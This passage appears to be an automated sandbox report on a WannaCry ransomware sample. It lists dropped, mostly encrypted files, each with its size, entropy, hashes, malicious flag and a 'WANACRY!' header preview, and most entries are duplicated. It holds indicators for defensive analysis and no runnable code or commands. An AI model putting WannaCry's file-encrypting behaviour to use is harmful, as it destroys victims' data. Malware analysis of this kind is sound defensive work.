                                                                                      Preview:WANACRY!.....q5..]...L..[?|..l>....>Z..+.?g..{.d..5...+8.J%Ra:P>...ZGRh{...C....jr?LSy..Im,4...J...;(.$..T.x.....85........]..|...#...{..on.D.$l.$...0%[.g.Oj......E..!.b...*||H.U...nsO.!..K+...q....~c&.]\.%....\.F.M.v2.-....-....=:...z.`..X.....:..X....O-......~.|:.$,#1(....N.......[..W/.<......mE......H.#..U.......6..j .'`..k...ln...S.s.2...u....'-%.%....N[..d.....>..)..n4/;..N...,.[K..z!......;..fc..s.!..]..f...7..^....b...i....\-N....t.,...p.....V..M....d.~..#...D...../...[.0.O.^.......M*..2.t$.....!!.H."(..~.R.F.5..2|.....5xP.d......r..*..2..]f......".....A..,Y}.3........B..3..e.a..B..lc.fQ!f.....C.'i...~..)q/..{...\.1.o.....X..J..@p..y ./...Bu......Mf.u.;...>.....[..l...U.......WR..GT...m.=.H5}K.eB.i.c.|o....].O<q.....l.....iJ.-.x.#^.+...P.W')s.V...;6@%U..:...b..R.%..2..~....}...8.V"&.....t...:.../..?.!.z..Ug.....J.l..S}x.....r.....ON.......n.H5tp\MS..P....@.Y.x..w.g.j.a+...m.....}.Cc[3..-8Z........~.z....P.i../..n3c..w.5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20568
                                                                                      Entropy (8bit):7.992217795595199
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:UI6q4kpbPuAhmWEHFUdMxBsClQKZFOzGC5DeN0Gvk0Of96DQEx6rZjl9bug:UTkpbPu8SUdbgFOzGSmOV6DQNlRug
                                                                                      MD5:AE3A9C8A74F83E35C044E3C20DCDB378
                                                                                      SHA1:368EB18659016D68FB91E706836300509162593B
                                                                                      SHA-256:8E2985FCA2577D79406370A93C11ECA2FEAFF421C0F6E4BC80D0B8A5673ABF44
                                                                                      SHA-512:888FC7584A7ADB866D31C6AB67D673B19FCADE3163E8AE1A164F82005311259B33AE507481562946EF6B037231992AD8CAA3B2856D1CBC3C06E5B52CC391F3EE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........@...l.f.%'e.`.Cv....].h.....4c\.1..Y*.U;.c..?W:8S....cN. .0.*.@.*.S...`..<>Q..)1)'..).m......}....G#f...)..o!'.[..(.h.U.$...p.,ya!..G..."..{.}....tH...q8&.+K!..:k^.....7.....S0..=.7.GRVn..}.....B..n.E....^N|a..yqP.[.ih5..4.X..L..h..~..O|..h.....4O........#..EZ...._..9JAa3......U...w.3 ..+.....hS.o....O...L..x.y.lIEN..../.I.....=.....9w+.%..<../o......}...@.....P.L.....b.....EI......cF.;.b#...5.....+..P.....w.......%...=8:..kLY......v.t>D...s.....L..s..u......=nh....F..T>#....A...Y.X......DX.X..{.....3.w...-...`/~.5..F}.s.A.R.J.I......1.=tm.....Q........x.un.u.+..Dw4=...*.3L..)..fe.d.e....d.....j.C....M4...o..... ...=.....b..E.{.....<CZ.s.......R.P.....D.v."-.b!...,0.s..86;E,.>...?.y.lhOlx]Q.g....XKu..{......#..C.....](m.....ly...A.J.;m...........\.g,N...&...^^..yn6(.3P.dh..s....}z..=....m._.:...L.WD..m..!....z.(.x.....D.1;...,...Sp...}.[-..S..N.....VrG.{W=v.N.V.3..|...a.S.t?0c%Y.O?...G...zH.B%J.06,.X....o......5.hCO....p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20568
                                                                                      Entropy (8bit):7.992217795595199
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:UI6q4kpbPuAhmWEHFUdMxBsClQKZFOzGC5DeN0Gvk0Of96DQEx6rZjl9bug:UTkpbPu8SUdbgFOzGSmOV6DQNlRug
                                                                                      MD5:AE3A9C8A74F83E35C044E3C20DCDB378
                                                                                      SHA1:368EB18659016D68FB91E706836300509162593B
                                                                                      SHA-256:8E2985FCA2577D79406370A93C11ECA2FEAFF421C0F6E4BC80D0B8A5673ABF44
                                                                                      SHA-512:888FC7584A7ADB866D31C6AB67D673B19FCADE3163E8AE1A164F82005311259B33AE507481562946EF6B037231992AD8CAA3B2856D1CBC3C06E5B52CC391F3EE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........@...l.f.%'e.`.Cv....].h.....4c\.1..Y*.U;.c..?W:8S....cN. .0.*.@.*.S...`..<>Q..)1)'..).m......}....G#f...)..o!'.[..(.h.U.$...p.,ya!..G..."..{.}....tH...q8&.+K!..:k^.....7.....S0..=.7.GRVn..}.....B..n.E....^N|a..yqP.[.ih5..4.X..L..h..~..O|..h.....4O........#..EZ...._..9JAa3......U...w.3 ..+.....hS.o....O...L..x.y.lIEN..../.I.....=.....9w+.%..<../o......}...@.....P.L.....b.....EI......cF.;.b#...5.....+..P.....w.......%...=8:..kLY......v.t>D...s.....L..s..u......=nh....F..T>#....A...Y.X......DX.X..{.....3.w...-...`/~.5..F}.s.A.R.J.I......1.=tm.....Q........x.un.u.+..Dw4=...*.3L..)..fe.d.e....d.....j.C....M4...o..... ...=.....b..E.{.....<CZ.s.......R.P.....D.v."-.b!...,0.s..86;E,.>...?.y.lhOlx]Q.g....XKu..{......#..C.....](m.....ly...A.J.;m...........\.g,N...&...^^..yn6(.3P.dh..s....}z..=....m._.:...L.WD..m..!....z.(.x.....D.1;...,...Sp...}.[-..S..N.....VrG.{W=v.N.V.3..|...a.S.t?0c%Y.O?...G...zH.B%J.06,.X....o......5.hCO....p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):13176
                                                                                      Entropy (8bit):7.986056114103658
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5Ko2rBVJZOSr6b4+BvsS1hqnaFyFcHjcSQ87o4qhfpb17:uMSr6b4KvD1PMcDnQ8Z8p5
                                                                                      MD5:CA711319308919D13704CD93CE7339FC
                                                                                      SHA1:BA165B13072FCFC6E286CE91312EAAB8FA6AED49
                                                                                      SHA-256:E3CE1B4BFD5534C886A1BAC4B73E191CB1780D6F4DFD9790E77CEA662F3CD7D8
                                                                                      SHA-512:01CAFDDCF40C4670D8E6A092B3F63A95C6F4B28ACA830065AEFFBBEAE8AC6E2A364F1A6EB6CE82F2F1B755797506B9F21A1C6C94E87C78E75059F624CBCADF3C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......l..K..F3..H-..X|.M.7....."....4...|.#_.Hu\....bT?..p.J....wp....#.c...M..sH'#.z..Z.<f0.3.E] ~P2H..oh.<....mK.R..\o.....L!...u.$..x.#.-.r.v...k.D?}6>j..:.".P0L..j..F(..C.oq.@3........ .G......A".8.An..;KG.@....8f....b.-lc-.a...bH.A._.K{...N..f..X.....^2...........k6V......1......'..0..h9..P..CU..=..k?@. Z....?cp...hA[...ntD\./.......:v.~J#o-.........kpm.{..B.).q.{y..q..e...{w.T*t&..l./..i....w.....i.-.G.B..p@u......h.I....:r|8v.%.6...._......w...;...A{h..]..~U#&"?....=Il..._.&.....y.5.f%...DxE..............k.....x...)y....mF...D@...soIi....)d........{.3.^......xB./..Q........y.../2PS..f^.....Ze'.tPS@H.P.j,%.-J>. ..&<h"w.<*.z.M.e...W".. @,=X..X...4.u./......m....{.Y#.....Z.F.K.....2.....Lliy..f...&:.Y..q.....3.f.6}&...Z..A.k...l.l.5CX.w.........6.{H............c.K......yBK.zDB.9.......m..........F...S..O.v.)......5-w...q.t..... /..\e?V..6.%.7...Sn..'~.I..le.?W..E....fG..i.X...8.=..K...bT};Y.G..;..Q......|4!....t.BD[.C.*.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):13176
                                                                                      Entropy (8bit):7.986056114103658
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5Ko2rBVJZOSr6b4+BvsS1hqnaFyFcHjcSQ87o4qhfpb17:uMSr6b4KvD1PMcDnQ8Z8p5
                                                                                      MD5:CA711319308919D13704CD93CE7339FC
                                                                                      SHA1:BA165B13072FCFC6E286CE91312EAAB8FA6AED49
                                                                                      SHA-256:E3CE1B4BFD5534C886A1BAC4B73E191CB1780D6F4DFD9790E77CEA662F3CD7D8
                                                                                      SHA-512:01CAFDDCF40C4670D8E6A092B3F63A95C6F4B28ACA830065AEFFBBEAE8AC6E2A364F1A6EB6CE82F2F1B755797506B9F21A1C6C94E87C78E75059F624CBCADF3C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......l..K..F3..H-..X|.M.7....."....4...|.#_.Hu\....bT?..p.J....wp....#.c...M..sH'#.z..Z.<f0.3.E] ~P2H..oh.<....mK.R..\o.....L!...u.$..x.#.-.r.v...k.D?}6>j..:.".P0L..j..F(..C.oq.@3........ .G......A".8.An..;KG.@....8f....b.-lc-.a...bH.A._.K{...N..f..X.....^2...........k6V......1......'..0..h9..P..CU..=..k?@. Z....?cp...hA[...ntD\./.......:v.~J#o-.........kpm.{..B.).q.{y..q..e...{w.T*t&..l./..i....w.....i.-.G.B..p@u......h.I....:r|8v.%.6...._......w...;...A{h..]..~U#&"?....=Il..._.&.....y.5.f%...DxE..............k.....x...)y....mF...D@...soIi....)d........{.3.^......xB./..Q........y.../2PS..f^.....Ze'.tPS@H.P.j,%.-J>. ..&<h"w.<*.z.M.e...W".. @,=X..X...4.u./......m....{.Y#.....Z.F.K.....2.....Lliy..f...&:.Y..q.....3.f.6}&...Z..A.k...l.l.5CX.w.........6.{H............c.K......yBK.zDB.9.......m..........F...S..O.v.)......5-w...q.t..... /..\e?V..6.%.7...Sn..'~.I..le.?W..E....fG..i.X...8.=..K...bT};Y.G..;..Q......|4!....t.BD[.C.*.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):36264
                                                                                      Entropy (8bit):7.9952194763710285
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:RDYkuysCdSR0V2GyM6BF1NDOvOjDHBeaiLOP:RDNUCcRMyHqOjDQLOP
                                                                                      MD5:B4B902390F6BC4C4A27FB269B7EAFB0E
                                                                                      SHA1:E4A18F8667D5D7A4E9218813509A86FE202DF7E0
                                                                                      SHA-256:2DE7E0F0C50BD4D74C3E3934A71504BCA4E5E97FC2C415A3AFA546C703A2C06F
                                                                                      SHA-512:5723038451E406913039A1BE8356977E4232747C59CC1170D669C0968AB5359E8F4D25EA6A90C6ABADA427547660CA6596B8F31130474777AA6EF36C61C70BBF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d...&..|/.Q..0.....;. .W..+..VK!../.\.+.8...........5*...J.....4{...t..`.#.&.3.&.sK.s..........o.,..z.x..t..E..y..q..y....~ ..._.......me..O^U...#<.2........V.~...q..;.]..f?....l....."bR......_[...f..,".............m;...(l.......jsQ..p...'............(t.2....tL.6...p...&H..... .....T.].-...-u.[}.3..6 .......F!t...k.J..xn../..9..IG4..Zs.".8.7........zfk..\....y..G.-(5._.M|.n........'6.P~5.).DU.G*2..3..m.Z+....].........0q...h....eW@.2dI%,l.`.i.{...&.N..s.F..yY?f.fR..8.&.|.M(C.M9.R.(...g.v'....N......dZ.....=8.+F.6X..W.....8.......&....AP...>...+....Z.No9....U.".....:.Y.B....ju.[....b....}./h.0..........|....<........aK.W[.6$.V.X....[!g.b.y(>.!.P.W...N.(,.l...Z..X.&h.#.'.+.A...X..a8c8h..g....r.I..&..p.[.J.....|Y....J..L...9......+.... ....8..8.`z.(&..n.}..M..+V..Al::q.<..}.Q...FP..<}..h.S.1...By..#..r.w.IT<+.y....._...H!.0.N.f....|\.C4...-....=...'........ 5_D$..u..`7G.J....(>.`.........Dz.7.~....+X........G...q,%?...&.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):36264
                                                                                      Entropy (8bit):7.9952194763710285
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:RDYkuysCdSR0V2GyM6BF1NDOvOjDHBeaiLOP:RDNUCcRMyHqOjDQLOP
                                                                                      MD5:B4B902390F6BC4C4A27FB269B7EAFB0E
                                                                                      SHA1:E4A18F8667D5D7A4E9218813509A86FE202DF7E0
                                                                                      SHA-256:2DE7E0F0C50BD4D74C3E3934A71504BCA4E5E97FC2C415A3AFA546C703A2C06F
                                                                                      SHA-512:5723038451E406913039A1BE8356977E4232747C59CC1170D669C0968AB5359E8F4D25EA6A90C6ABADA427547660CA6596B8F31130474777AA6EF36C61C70BBF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....d...&..|/.Q..0.....;. .W..+..VK!../.\.+.8...........5*...J.....4{...t..`.#.&.3.&.sK.s..........o.,..z.x..t..E..y..q..y....~ ..._.......me..O^U...#<.2........V.~...q..;.]..f?....l....."bR......_[...f..,".............m;...(l.......jsQ..p...'............(t.2....tL.6...p...&H..... .....T.].-...-u.[}.3..6 .......F!t...k.J..xn../..9..IG4..Zs.".8.7........zfk..\....y..G.-(5._.M|.n........'6.P~5.).DU.G*2..3..m.Z+....].........0q...h....eW@.2dI%,l.`.i.{...&.N..s.F..yY?f.fR..8.&.|.M(C.M9.R.(...g.v'....N......dZ.....=8.+F.6X..W.....8.......&....AP...>...+....Z.No9....U.".....:.Y.B....ju.[....b....}./h.0..........|....<........aK.W[.6$.V.X....[!g.b.y(>.!.P.W...N.(,.l...Z..X.&h.#.'.+.A...X..a8c8h..g....r.I..&..p.[.J.....|Y....J..L...9......+.... ....8..8.`z.(&..n.}..M..+V..Al::q.<..}.Q...FP..<}..h.S.1...By..#..r.w.IT<+.y....._...H!.0.N.f....|\.C4...-....=...'........ 5_D$..u..`7G.J....(>.`.........Dz.7.~....+X........G...q,%?...&.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21048
                                                                                      Entropy (8bit):7.9903807642026905
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:vlNBK5CDBxuawHkiLfNk3kpCr/BGS0XvMgQIWSG9aNsLGO3yJM4HnHsDs:z85CA9LfNUZBGS0XH4B9aNsLGYyi6Mg
                                                                                      MD5:F51CBEEBFEF19AF77A73D70CE5E33920
                                                                                      SHA1:CECA05B3C5781C911A083A006F9F4F0657B2E859
                                                                                      SHA-256:05AEC5FA091164237D94EDA1E4758C9F46553758D7BBE60FBBE501572BB22ABF
                                                                                      SHA-512:41CA67712A58D8C66D7A15EF52D65332F119A19237A9CF02B5CAD0AE206D3986DC35A5CD3336ECB3496CDBC1E7B88FBD8FF8D0E6E5529768648275C61A119DD7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a&.!..:.t]....D.w?B.d....._......:.......-6....E..7J..z.&....)^.....|....N....z..>.H.O.o....~....>:... .y..2.:lA.gPM...U......m).n5.z...Vc-\.:.^..e.._f.?g...a.'.,>:.fc..k.R....'......(.......0X..P.. .Y/.A.;.....[.%|6<.'..?L....o^... .H.>#..N.....Q.........V]..ID.)...,.6.H..H.w.t#W,....3.. .c.N..........0l.h...JF.g...e..:?....?.`j\e.t.h&../|+..V.....z).Z....+a.DNd..L.?..h.2h.p.W........>O'..h.....G..0.a.V..g...'..JE1...^.......!.e..S^...d..n..x...X....`.G...[...t..R!1...60.q...}.$...j...eR.........~E{...........:.<...............ynV*..d[.:..*j......1..3:.6.y6z.9..<.z......h99....072....5\`:...Y.....2S..bN..b........iy<.]e.,..r.u.....1.W.b..I.Y..%;...-..=. ._.s...N..q.0y....*...9..c.<..y`T..A.;.`.q..lm4..l...f=0.B...+M....g.Q.Nt.ue ....n.f.6q..9..z})....5...tW...........H.q..A...........:1..%v.v. J_I&.W.`Hgt3..o.....Tc.mc....%.. .O.\....t....Z;.f,.Q..=....L..h4...#.."....Jl..9 .}...o........|.W.[...%v.BEL>....2..M....d<#_U..N:.hnm...=.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21048
                                                                                      Entropy (8bit):7.9903807642026905
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:vlNBK5CDBxuawHkiLfNk3kpCr/BGS0XvMgQIWSG9aNsLGO3yJM4HnHsDs:z85CA9LfNUZBGS0XH4B9aNsLGYyi6Mg
                                                                                      MD5:F51CBEEBFEF19AF77A73D70CE5E33920
                                                                                      SHA1:CECA05B3C5781C911A083A006F9F4F0657B2E859
                                                                                      SHA-256:05AEC5FA091164237D94EDA1E4758C9F46553758D7BBE60FBBE501572BB22ABF
                                                                                      SHA-512:41CA67712A58D8C66D7A15EF52D65332F119A19237A9CF02B5CAD0AE206D3986DC35A5CD3336ECB3496CDBC1E7B88FBD8FF8D0E6E5529768648275C61A119DD7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....a&.!..:.t]....D.w?B.d....._......:.......-6....E..7J..z.&....)^.....|....N....z..>.H.O.o....~....>:... .y..2.:lA.gPM...U......m).n5.z...Vc-\.:.^..e.._f.?g...a.'.,>:.fc..k.R....'......(.......0X..P.. .Y/.A.;.....[.%|6<.'..?L....o^... .H.>#..N.....Q.........V]..ID.)...,.6.H..H.w.t#W,....3.. .c.N..........0l.h...JF.g...e..:?....?.`j\e.t.h&../|+..V.....z).Z....+a.DNd..L.?..h.2h.p.W........>O'..h.....G..0.a.V..g...'..JE1...^.......!.e..S^...d..n..x...X....`.G...[...t..R!1...60.q...}.$...j...eR.........~E{...........:.<...............ynV*..d[.:..*j......1..3:.6.y6z.9..<.z......h99....072....5\`:...Y.....2S..bN..b........iy<.]e.,..r.u.....1.W.b..I.Y..%;...-..=. ._.s...N..q.0y....*...9..c.<..y`T..A.;.`.q..lm4..l...f=0.B...+M....g.Q.Nt.ue ....n.f.6q..9..z})....5...tW...........H.q..A...........:1..%v.v. J_I&.W.`Hgt3..o.....Tc.mc....%.. .O.\....t....Z;.f,.Q..=....L..h4...#.."....Jl..9 .}...o........|.W.[...%v.BEL>....2..M....d<#_U..N:.hnm...=.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7304
                                                                                      Entropy (8bit):7.974156951021801
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ppIgdNkT8VE36epQLXzs7N2buHEGLp17h0k9Iv3+9pj0+FrAMhQ:/RdVlxHCN2bukCjOk2v3+o+1ZQ
                                                                                      MD5:948E8C63FFAE471324036923CEC8AA90
                                                                                      SHA1:CB910E73327F292FBA68134CFA088CB2959DE3A5
                                                                                      SHA-256:568F6AD531FAFBE8E0F54BDCB1A2C0D6A393DAD50B425BC5F1626E5E26B40FAF
                                                                                      SHA-512:7EF71B6B5A507268C5722420424BA2AE4C92D6BA3D382DFE144233CAB24232477E7FC52C9E16FE921D97C7BD68626FCC7133F486F96421C21C228B6CEDCF7FA6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....xZ{.)g.~..gJ..._...k.0...'..7...'u."#6....67..-.hu.....F....zj..h}....L1n.z....s.....,.....,=..i.$.i:b.9.....670.......7........W........FsE)..K.._...........\....X.m.Y.S...h...&l........W.S.}.9..).e.,.)....7.....\s..cM[k.Z...2..K.Ntv.6..A.....o.......LY_.d....<.....1..$.....;...t......ZTR.._.j%..x.=.. ..KH.4T....K+...1...X....W:....gX.,..(.0..i.....6.=.Cd..%.......Q.}.v.P.2.z.."..'".x.[L...^.#m.W@+]...nl.7.5@9...s8Q....9..!w...-.7w.M..$..Hd.p...e...........#Os9-F.t`0}S-...F.C..4..E..a...Cb1..V^T$.8uM0....0....+.........%...C .M.p...w.a5!...v2e.[I.%PO....Xu#L..9(!..T.....qr$m.E...!33.0-.1..U.xv......=....;.d'!K.3..KU...?.C._U...49.<./.F..^3U..^.|N.w...Wc.YF..kh.^'..Q1..c....X.g/..P.!+.X[C>...?..O(5........Z.f..@..P9.R....2.N#......D=.Tks.}*.>...B@.....`.D....q.w..8.f..5.n........F_..b....<...v..At.>..W......'.V..~.f..~..~.l.CS|oU..6......9C...?j...V.g..Gg..p.0..&...:.....O.R...a.N...iy@....D=.\..;Y.h....e.........6 ...V4..`....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7304
                                                                                      Entropy (8bit):7.974156951021801
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ppIgdNkT8VE36epQLXzs7N2buHEGLp17h0k9Iv3+9pj0+FrAMhQ:/RdVlxHCN2bukCjOk2v3+o+1ZQ
                                                                                      MD5:948E8C63FFAE471324036923CEC8AA90
                                                                                      SHA1:CB910E73327F292FBA68134CFA088CB2959DE3A5
                                                                                      SHA-256:568F6AD531FAFBE8E0F54BDCB1A2C0D6A393DAD50B425BC5F1626E5E26B40FAF
                                                                                      SHA-512:7EF71B6B5A507268C5722420424BA2AE4C92D6BA3D382DFE144233CAB24232477E7FC52C9E16FE921D97C7BD68626FCC7133F486F96421C21C228B6CEDCF7FA6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....xZ{.)g.~..gJ..._...k.0...'..7...'u."#6....67..-.hu.....F....zj..h}....L1n.z....s.....,.....,=..i.$.i:b.9.....670.......7........W........FsE)..K.._...........\....X.m.Y.S...h...&l........W.S.}.9..).e.,.)....7.....\s..cM[k.Z...2..K.Ntv.6..A.....o.......LY_.d....<.....1..$.....;...t......ZTR.._.j%..x.=.. ..KH.4T....K+...1...X....W:....gX.,..(.0..i.....6.=.Cd..%.......Q.}.v.P.2.z.."..'".x.[L...^.#m.W@+]...nl.7.5@9...s8Q....9..!w...-.7w.M..$..Hd.p...e...........#Os9-F.t`0}S-...F.C..4..E..a...Cb1..V^T$.8uM0....0....+.........%...C .M.p...w.a5!...v2e.[I.%PO....Xu#L..9(!..T.....qr$m.E...!33.0-.1..U.xv......=....;.d'!K.3..KU...?.C._U...49.<./.F..^3U..^.|N.w...Wc.YF..kh.^'..Q1..c....X.g/..P.!+.X[C>...?..O(5........Z.f..@..P9.R....2.N#......D=.Tks.}*.>...B@.....`.D....q.w..8.f..5.n........F_..b....<...v..At.>..W......'.V..~.f..~..~.l.CS|oU..6......9C...?j...V.g..Gg..p.0..&...:.....O.R...a.N...iy@....D=.\..;Y.h....e.........6 ...V4..`....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80360
                                                                                      Entropy (8bit):7.9976343097462665
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:80r0jW7U+rbcSpNRcwskEYs2ZALR8vr01DNWahC7nvFu/SlnH:FraWwkrRlsos2KL8wDWawjgeH
                                                                                      MD5:88CB8AC57F6A467866BC9D8157A4074D
                                                                                      SHA1:C06A988A3A8F652AB62A8EE4261D2EF09C6825C0
                                                                                      SHA-256:2FF36F9EA24B28166F6D77BCFFB508E02C310658150D3E657355B53B03B8D11A
                                                                                      SHA-512:6B2226D1513B94CC0C4B124E4BC3750A40C167D318F316AC679BD5F8E87FD6D3B3F7C1885537DC948536FD09EDF8A8281E4B6F2CCAAAD67090F2FB10E161C8A8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......N...{...(6w...A.<..*...G0.......Vu.U...........9.+.3..2....b....Z.J@......2B......h.../?......uB.i?...)....4.]...G.1.|...$!.uk....M...3.H.M....Q..9..B.{`ef......S..:..5..6.7n....'...m.../J.pFKJs..Yk>F....Y...J...D.C...t.m.q.....p.....L./......8..........?3...&.d^....P.BS....M.`..e0!8...N.P.......:..2M8..i.?.....fE...n..)7.N>n.m....%YW.......&.....:..\.o.....z.g0j.1eZ...f....e.2..:..)Gk...#.8bU......K.?1.........R.......!.e.fR.!gw..Q..rA...q.{*...0q..f..9..k.B]U..^..ddY0:..3...|.?t.........FU-.Uu..K.H...m.cim...\.;..../>T.....`&.0..v..K-...$&...):..1...Q.j..R...'B.........`nR....... .Y.&.<.7.%....{b.+s..w....i.<.).....S......z.....bA...v8...2.q.....=W..J.....l1.h.>H...K.$.m..,?..C.||i.....,..kk....B..%G"H...Z8L.YF.F.M.?.u..~.pc^...8..'jl......#.8L........1;..A....`L6I3d..jI.7..O0Q.1VW#.++..3....*.U..U..R~.u...y.^&.P.aS..#I%..,q.....?.eV.$.8JN...b..0.fe>.3...HZ.....gm*..z.E...fE.._.9.."..W..I..f..u......ll{!...Y..Mdkc/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):80360
                                                                                      Entropy (8bit):7.9976343097462665
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:80r0jW7U+rbcSpNRcwskEYs2ZALR8vr01DNWahC7nvFu/SlnH:FraWwkrRlsos2KL8wDWawjgeH
                                                                                      MD5:88CB8AC57F6A467866BC9D8157A4074D
                                                                                      SHA1:C06A988A3A8F652AB62A8EE4261D2EF09C6825C0
                                                                                      SHA-256:2FF36F9EA24B28166F6D77BCFFB508E02C310658150D3E657355B53B03B8D11A
                                                                                      SHA-512:6B2226D1513B94CC0C4B124E4BC3750A40C167D318F316AC679BD5F8E87FD6D3B3F7C1885537DC948536FD09EDF8A8281E4B6F2CCAAAD67090F2FB10E161C8A8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......N...{...(6w...A.<..*...G0.......Vu.U...........9.+.3..2....b....Z.J@......2B......h.../?......uB.i?...)....4.]...G.1.|...$!.uk....M...3.H.M....Q..9..B.{`ef......S..:..5..6.7n....'...m.../J.pFKJs..Yk>F....Y...J...D.C...t.m.q.....p.....L./......8..........?3...&.d^....P.BS....M.`..e0!8...N.P.......:..2M8..i.?.....fE...n..)7.N>n.m....%YW.......&.....:..\.o.....z.g0j.1eZ...f....e.2..:..)Gk...#.8bU......K.?1.........R.......!.e.fR.!gw..Q..rA...q.{*...0q..f..9..k.B]U..^..ddY0:..3...|.?t.........FU-.Uu..K.H...m.cim...\.;..../>T.....`&.0..v..K-...$&...):..1...Q.j..R...'B.........`nR....... .Y.&.<.7.%....{b.+s..w....i.<.).....S......z.....bA...v8...2.q.....=W..J.....l1.h.>H...K.$.m..,?..C.||i.....,..kk....B..%G"H...Z8L.YF.F.M.?.u..~.pc^...8..'jl......#.8L........1;..A....`L6I3d..jI.7..O0Q.1VW#.++..3....*.U..U..R~.u...y.^&.P.aS..#I%..,q.....?.eV.$.8JN...b..0.fe>.3...HZ.....gm*..z.E...fE.._.9.."..W..I..f..u......ll{!...Y..Mdkc/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):43880
                                                                                      Entropy (8bit):7.996249773781708
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:S5EPmTOjr1MaXVgQgbDenDJPZvBwKqY5Mu9oKTCzN5Ui6q7peiRZpiktoUCbaYbK:HPmTYr1MC915J9/O31V7pjoha1bS2
                                                                                      MD5:3E1A9F21443FBC5A9AA43B5B8E78764A
                                                                                      SHA1:61957CD6771AD1D416CE4FB047C44A2BDF9A52CB
                                                                                      SHA-256:1BDFA3BAC15C6BD7BD5AE0E9BCA3AE7F277099526DAC82BEC60516941DEEEEA2
                                                                                      SHA-512:99244C3BBF09C0403F942677AE728E46BC30BFC2E40B5472946795CA05B7971E3FB2D1EF372ACC209EC2913A6C55B94DAF40E4146BA82ACA6E30841A953A0338
                                                                                      Malicious:true
                                                                                      Reputation:low
